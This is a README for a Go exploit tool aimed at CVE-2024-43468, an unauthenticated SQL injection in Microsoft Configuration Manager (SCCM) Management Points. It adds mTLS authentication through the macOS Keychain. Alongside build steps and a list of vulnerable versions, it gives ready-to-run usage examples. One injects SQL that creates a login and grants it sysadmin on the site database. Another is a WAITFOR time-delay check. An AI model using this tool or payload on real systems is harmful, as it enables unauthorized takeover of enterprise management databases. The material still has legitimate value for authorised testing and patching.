# CVE-2024-43468 SCCM SQL Injection Exploit (mTLS client certs from MacOS keychain version)

Go implementation of [CVE-2024-43468]( exploit that uses macOS Keychain for mTLS authentication (without need to export keys from keychain). 

- Added proxy support to not use problematic proxychains.
- Added to get certificate Common Name (yes, you can do it from Keychain Access GUI manually)
- Added a lot of debugging to see what's going on

Based on:
- [original Python exploit](
- [mTLS Go Client example](

## Description

Exploits unauthenticated SQL injections in Microsoft Configuration Manager (ConfigMgr / SCCM) that allows an attacker with network access to a Management Point to execute arbitrary SQL queries on the site database.

Vulnerable versions:
- < 2403 (5.00.9128.1024)
- < 2309 (5.00.9122.1033)
- < 2303 (5.00.9106.1037)
- <= 2211

## Installation

# Clone repository
git clone
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get
go get

# Build
go build -o sccm

## Usage

# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy ""

### Parameters

- `-t` : Target URL (required)
- `-sql` : SQL query to execute (required)
- `-cn` : Certificate Common Name in macOS Keychain (required)
- `-proxy` : SOCKS5 proxy address (default: empty)

## Requirements

- macOS (for Keychain integration)
- Go 1.16+
- Client certificate in macOS Keychain
- optional: SOCKS5 proxy

## References

- [Microsoft Advisory](
- [Synacktiv Advisory](
- [mTLS Go Client example](